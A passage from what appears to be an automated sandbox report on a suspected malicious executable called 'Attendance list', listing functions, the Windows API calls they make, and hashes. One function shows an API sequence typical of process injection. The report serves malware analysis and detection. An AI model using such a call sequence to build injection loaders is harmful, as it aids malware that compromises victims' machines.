                        • Opcode ID: 1b274f0ff7b08721a36f922c1d65737766ee6d5dfce531233954da149d166dbb
                        • Instruction ID: ee6640dd2a10cf47fdae8e7296f30bd31b4153cc4479ec83647ae2886a98194a
                        • Opcode Fuzzy Hash: 1b274f0ff7b08721a36f922c1d65737766ee6d5dfce531233954da149d166dbb
                        • Instruction Fuzzy Hash: EDD05E7A54430EABDB209B90DC0EF9A772CE744704F0042A1BE64910A1DEF155989B91
                        Function 0093CDF1 Relevance: 4.9, APIs: 3, Instructions: 392COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9cee3d4e9656118914f737616d9c913b2a02d6105f617cedc245a73548f64a8e
                        • Instruction ID: 5fd637c03d561da23e55bfa32ef1c7dc634b3f03b9dab77d1d17a8670f074d96
                        • Opcode Fuzzy Hash: 9cee3d4e9656118914f737616d9c913b2a02d6105f617cedc245a73548f64a8e
                        • Instruction Fuzzy Hash: 2CF15971A083019FCB14DF28D494A6ABBE5FF88314F14896EF8A99B351D731E945CF82
                        Function 008CF8CF Relevance: 4.7, APIs: 3, Instructions: 168comCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 008E03A2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 008E03D3
                          • Part of subcall function 008E03A2: MapVirtualKeyW.USER32(00000010,00000000), ref: 008E03DB
                          • Part of subcall function 008E03A2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 008E03E6
                          • Part of subcall function 008E03A2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 008E03F1
                          • Part of subcall function 008E03A2: MapVirtualKeyW.USER32(00000011,00000000), ref: 008E03F9
                          • Part of subcall function 008E03A2: MapVirtualKeyW.USER32(00000012,00000000), ref: 008E0401
                          • Part of subcall function 008D6259: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,008CFA90), ref: 008D62B4
                        • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 008CFB2D
                        • OleInitialize.OLE32(00000000), ref: 008CFBAA
                        • CloseHandle.KERNEL32(00000000), ref: 009049F2
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                        • String ID:
                        • API String ID: 1986988660-0
                        • Opcode ID: 4e0d757680b156b12396738f29082e618c96e1808f9e8544a21040c07afb7aee
                        • Instruction ID: 84889675a6489eb11194280a0082044dfe4f0f3ac477c979a9b82fafb7302f56
                        • Opcode Fuzzy Hash: 4e0d757680b156b12396738f29082e618c96e1808f9e8544a21040c07afb7aee
                        • Instruction Fuzzy Hash: 908187B09293408EC394EF7AE954A197BF5FB99308B10852EE419CF376EB358405EF52
                        Function 008C43DB Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                        Download Yara Rule
                        APIs
                        • _memset.LIBCMT ref: 008C4401
                        • Shell_NotifyIconW.SHELL32(00000000,?), ref: 008C44A6
                        • Shell_NotifyIconW.SHELL32(00000001,?), ref: 008C44C3
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: IconNotifyShell_$_memset
                        • String ID:
                        • API String ID: 1505330794-0
                        • Opcode ID: 0ce193cbdbf7250822713fc57c6c583e0bc747671e76b373499df80355498be5
                        • Instruction ID: dec34e3eb78ef9abc66d3954d118cb1fcf43136806250d6c2efdcfd163c74351
                        • Opcode Fuzzy Hash: 0ce193cbdbf7250822713fc57c6c583e0bc747671e76b373499df80355498be5
                        • Instruction Fuzzy Hash: 0C318FB05097018FD724DF24D894B9BBBF8FB49308F10092EE59AC7251E775A988CB96
                        Function 008E594C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • __FF_MSGBANNER.LIBCMT ref: 008E5963
                          • Part of subcall function 008EA3AB: __NMSG_WRITE.LIBCMT ref: 008EA3D2
                          • Part of subcall function 008EA3AB: __NMSG_WRITE.LIBCMT ref: 008EA3DC
                        • __NMSG_WRITE.LIBCMT ref: 008E596A
                          • Part of subcall function 008EA408: GetModuleFileNameW.KERNEL32(00000000,009843BA,00000104,?,00000001,00000000), ref: 008EA49A
                          • Part of subcall function 008EA408: ___crtMessageBoxW.LIBCMT ref: 008EA548
                          • Part of subcall function 008E32DF: ___crtCorExitProcess.LIBCMT ref: 008E32E5
                          • Part of subcall function 008E32DF: ExitProcess.KERNEL32 ref: 008E32EE
                          • Part of subcall function 008E8D68: __getptd_noexit.LIBCMT ref: 008E8D68
                        • RtlAllocateHeap.NTDLL(00FE0000,00000000,00000001,00000000,?,?,?,008E1013,?), ref: 008E598F
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                        • String ID:
                        • API String ID: 1372826849-0
                        • Opcode ID: 6efc9dbcd3d8d23334c51df261c5b113c2d9f5c1cf9a1b7e4ac57119669c7d3e
                        • Instruction ID: b608f0533239cd41bf48bf70202af99c4fd7f8e26101b81197026347a2846afc
                        • Opcode Fuzzy Hash: 6efc9dbcd3d8d23334c51df261c5b113c2d9f5c1cf9a1b7e4ac57119669c7d3e
                        • Instruction Fuzzy Hash: 4501D631304696DED611376BFC52BAD7648FF43B78F100026F414EB2C2DA709D015366
                        Function 00929B2C Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                        Download Yara Rule
                        APIs
                        • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,009297D2,?,?,?,?,?,00000004), ref: 00929B45
                        • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,009297D2,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00929B5B
                        • CloseHandle.KERNEL32(00000000,?,009297D2,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00929B62
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: File$CloseCreateHandleTime
                        • String ID:
                        • API String ID: 3397143404-0
                        • Opcode ID: 0f5b34ff0b2dd156573da0cd545ced07901f1aa29ed539684c3807bf514f1999
                        • Instruction ID: a3e8056c6a5768d5bbcb17633e8048a36866644f4e8a4f196ca70b789ef7690a
                        • Opcode Fuzzy Hash: 0f5b34ff0b2dd156573da0cd545ced07901f1aa29ed539684c3807bf514f1999
                        • Instruction Fuzzy Hash: A1E08636194225B7DB211F54EC09FCA7B58AB0AB61F104120FB14690E087B16511A798
                        Function 00928F97 Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                        Download Yara Rule
                        APIs
                        • _free.LIBCMT ref: 00928FA5
                          • Part of subcall function 008E2F95: RtlFreeHeap.NTDLL(00000000,00000000,?,008E9C64), ref: 008E2FA9
                          • Part of subcall function 008E2F95: GetLastError.KERNEL32(00000000,?,008E9C64), ref: 008E2FBB
                        • _free.LIBCMT ref: 00928FB6
                        • _free.LIBCMT ref: 00928FC8
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: _free$ErrorFreeHeapLast
                        • String ID:
                        • API String ID: 776569668-0
                        • Opcode ID: 358057a8cee776a4634d1da6a11f7167cf7af4a4bc472a0de26b354d0d310ced
                        • Instruction ID: dc25ff33149e6a205e5c78ea2cea020619a5a12aba9159a024e54e9abc2a98a2
                        • Opcode Fuzzy Hash: 358057a8cee776a4634d1da6a11f7167cf7af4a4bc472a0de26b354d0d310ced
                        • Instruction Fuzzy Hash: E3E0C2A120A7104ACA30A5BDBE00AC317EEBF48311708080DB409DB142DE20E8418064
                        Function 008CAB23 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID:
                        • String ID: CALL
                        • API String ID: 0-4196123274
                        • Opcode ID: 063db404eeb045ce6e6b2cac886866b049b516298e679a6f10836a5883bf8b55
                        • Instruction ID: e1a2832818bcf1d51df7ec65c1b6822489f554eaeeae8a678cb10a0291028c30
                        • Opcode Fuzzy Hash: 063db404eeb045ce6e6b2cac886866b049b516298e679a6f10836a5883bf8b55
                        • Instruction Fuzzy Hash: B42225745086558FCB28DF14C495F6ABBF1FB85308F14895DE89A8B262DB31EC81CB82
                        Function 008C4DD0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: _memmove
                        • String ID: EA06
                        • API String ID: 4104443479-3962188686
                        • Opcode ID: 1b03fb07cc9756be32edc550e604152642578e2ae785ea40ba8f3fb7a6a73d8b
                        • Instruction ID: f440fbdc32ceb3272d57f7fa3fd1c15e47dc8b0a33c6e4ede05f8d0aef332646
                        • Opcode Fuzzy Hash: 1b03fb07cc9756be32edc550e604152642578e2ae785ea40ba8f3fb7a6a73d8b
                        • Instruction Fuzzy Hash: F4416C31A046585BDF219B688871FBE7FB6FB01314F69606DED42DA282C631DDC083A2
                        Function 008C492E Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                        Download Yara Rule
                        APIs
                        • IsThemeActive.UXTHEME ref: 008C4992
                          • Part of subcall function 008E35AC: __lock.LIBCMT ref: 008E35B2
                          • Part of subcall function 008E35AC: DecodePointer.KERNEL32(00000001,?,008C49A7,009181BC), ref: 008E35BE
                          • Part of subcall function 008E35AC: EncodePointer.KERNEL32(?,?,008C49A7,009181BC), ref: 008E35C9
                          • Part of subcall function 008C4A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 008C4A73
                          • Part of subcall function 008C4A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 008C4A88
                          • Part of subcall function 008C3B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 008C3B7A
                          • Part of subcall function 008C3B4C: IsDebuggerPresent.KERNEL32 ref: 008C3B8C
                          • Part of subcall function 008C3B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,009862F8,009862E0,?,?), ref: 008C3BFD
                          • Part of subcall function 008C3B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 008C3C81
                        • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 008C49D2
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                        • String ID:
                        • API String ID: 1438897964-0
                        • Opcode ID: e7cf2f3985c096e537aff4908499f2dae1f4bbac19b1917582d92a2ee6a2248c
                        • Instruction ID: 5577705a984e5288a40ad1334d022f7eaf601fd6e59df3d4177624ca73147161
                        • Opcode Fuzzy Hash: e7cf2f3985c096e537aff4908499f2dae1f4bbac19b1917582d92a2ee6a2248c
                        • Instruction Fuzzy Hash: B61147719282119BC300EF69D849E0AFBF8FB95710F00455EF495C72B1DB70D945DB92
                        Function 008C5DF9 Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                        Download Yara Rule
                        APIs
                        • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,008C5981,?,?,?,?), ref: 008C5E27
                        • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,008C5981,?,?,?,?), ref: 008FE19C
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: CreateFile
                        • String ID:
                        • API String ID: 823142352-0
                        • Opcode ID: 8454aa4dda0c1691f6dd286b09e1cb485cd3acf20114d0eeaadcfcaff5fdad5a
                        • Instruction ID: 2e520c81b153d2ea356de7f574508058d9156f56e1c5da77f9a165d02a8cbfef
                        • Opcode Fuzzy Hash: 8454aa4dda0c1691f6dd286b09e1cb485cd3acf20114d0eeaadcfcaff5fdad5a
                        • Instruction Fuzzy Hash: 78017570244709BEF7240E25CC8AF763BACFB05768F108319BAE59A1E0C6B46E858B50
                        Function 008E0FF6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                          • Part of subcall function 008E594C: __FF_MSGBANNER.LIBCMT ref: 008E5963
                          • Part of subcall function 008E594C: __NMSG_WRITE.LIBCMT ref: 008E596A
                          • Part of subcall function 008E594C: RtlAllocateHeap.NTDLL(00FE0000,00000000,00000001,00000000,?,?,?,008E1013,?), ref: 008E598F
                        • std::exception::exception.LIBCMT ref: 008E102C
                        • __CxxThrowException@8.LIBCMT ref: 008E1041
                          • Part of subcall function 008E87DB: RaiseException.KERNEL32(?,?,?,0097BAF8,00000000,?,?,?,?,008E1046,?,0097BAF8,?,00000001), ref: 008E8830
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                        • String ID:
                        • API String ID: 3902256705-0
                        • Opcode ID: 91c629affc0e0a8091fe89fbed787650a4fb36988f1156491f4b39d58b2aa7bc
                        • Instruction ID: cfdd99e0310689e14fa8dec29ce25ce2a21bc59522438ca86c39b8f2b57be8c5
                        • Opcode Fuzzy Hash: 91c629affc0e0a8091fe89fbed787650a4fb36988f1156491f4b39d58b2aa7bc
                        • Instruction Fuzzy Hash: AFF08135504799A6CB20FB5AEC199DE7BA8FF03355F100425FD08E6691DFB18A848692
                        Function 008E582D Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: __lock_file_memset
                        • String ID:
                        • API String ID: 26237723-0
                        • Opcode ID: ef18b9107aa603324e7a998e44d393759cc9ec6674010630a56531ed1557446e
                        • Instruction ID: 0745481f27b78f94b367e8f549b097fcc18c62d735afa0a4706c2bae9dc6477c
                        • Opcode Fuzzy Hash: ef18b9107aa603324e7a998e44d393759cc9ec6674010630a56531ed1557446e
                        • Instruction Fuzzy Hash: CC018871C00699EBCF12AF6F8C0559F7B61FF82764F148225F828DB1A1DB318A21DB52
                        Function 008E55D6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                          • Part of subcall function 008E8D68: __getptd_noexit.LIBCMT ref: 008E8D68
                        • __lock_file.LIBCMT ref: 008E561B
                          • Part of subcall function 008E6E4E: __lock.LIBCMT ref: 008E6E71
                        • __fclose_nolock.LIBCMT ref: 008E5626
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                        • String ID:
                        • API String ID: 2800547568-0
                        • Opcode ID: b9e6730d7c240b1fbc2e34bdc6d78179eb0fe8629f1cf13d0b7ef31ea86d17ae
                        • Instruction ID: b01c6ace9354e9702b467e595c1b0b647f0c180be41196f8d427bdd291faface
                        • Opcode Fuzzy Hash: b9e6730d7c240b1fbc2e34bdc6d78179eb0fe8629f1cf13d0b7ef31ea86d17ae
                        • Instruction Fuzzy Hash: 1DF09071900A85DAD721AB7F880276E67A1FF5333CF658209A428EB1D1CF7C89019B56
                        Function 00E8129D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                        Download Yara Rule
                        APIs
                        • CreateProcessW.KERNELBASE(?,00000000), ref: 00E81A5B
                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00E81AF1
                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00E81B13
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995831329.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e80000_Attendance list.jbxd
                        Similarity
                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                        • String ID:
                        • API String ID: 2438371351-0
                        • Opcode ID: c7490eb0849e98549b11c4fe0459da6d53c4872c769bbd933b9fbf1e0076ab14
                        • Instruction ID: c0d2d40bddec31838d89f1aab4c6a5569e7ebe270b81a985d5cda7fc0f09551b
                        • Opcode Fuzzy Hash: c7490eb0849e98549b11c4fe0459da6d53c4872c769bbd933b9fbf1e0076ab14
                        • Instruction Fuzzy Hash: AE12BE24E14658C6EB24DF64D8507DEB232EF68300F10A0E9D10DEB7A5E77A4F81CB5A
                        Function 008D2123 Relevance: 1.7, APIs: 1, Instructions: 171COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 463c958743b79090836b8d5a4b06208c417af90e752fbf8ff111adf4b1660c6f
                        • Instruction ID: eb3144d6058d82ecd8c000077159337ce05f59c80f42e1d5573399092557c7c3
                        • Opcode Fuzzy Hash: 463c958743b79090836b8d5a4b06208c417af90e752fbf8ff111adf4b1660c6f
                        • Instruction Fuzzy Hash: 63515735600614AFCF14EB68C995FAE77A6FF85310F1481A9F956AB382CB30ED408B52
                        Function 008C766F Relevance: 1.6, APIs: 1, Instructions: 103COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: _memmove
                        • String ID:
                        • API String ID: 4104443479-0
                        • Opcode ID: 0f93539bf87354248685b11ab5cef8e514fcd7301a448428a953d4023ae7aa7a
                        • Instruction ID: e51a955d1d30793dfa4129c88f05ecc72ffe3f0b9427ed7bba345b8e1dd0ccc5
                        • Opcode Fuzzy Hash: 0f93539bf87354248685b11ab5cef8e514fcd7301a448428a953d4023ae7aa7a
                        • Instruction Fuzzy Hash: CA317A79208A069FC7249F19D490E22F7B0FF09310B14C56DE98ACB7A5EB30E891CF84
                        Function 008C5C4E Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                        Download Yara Rule
                        APIs
                        • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000000,?,?,00000000), ref: 008C5CF6
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
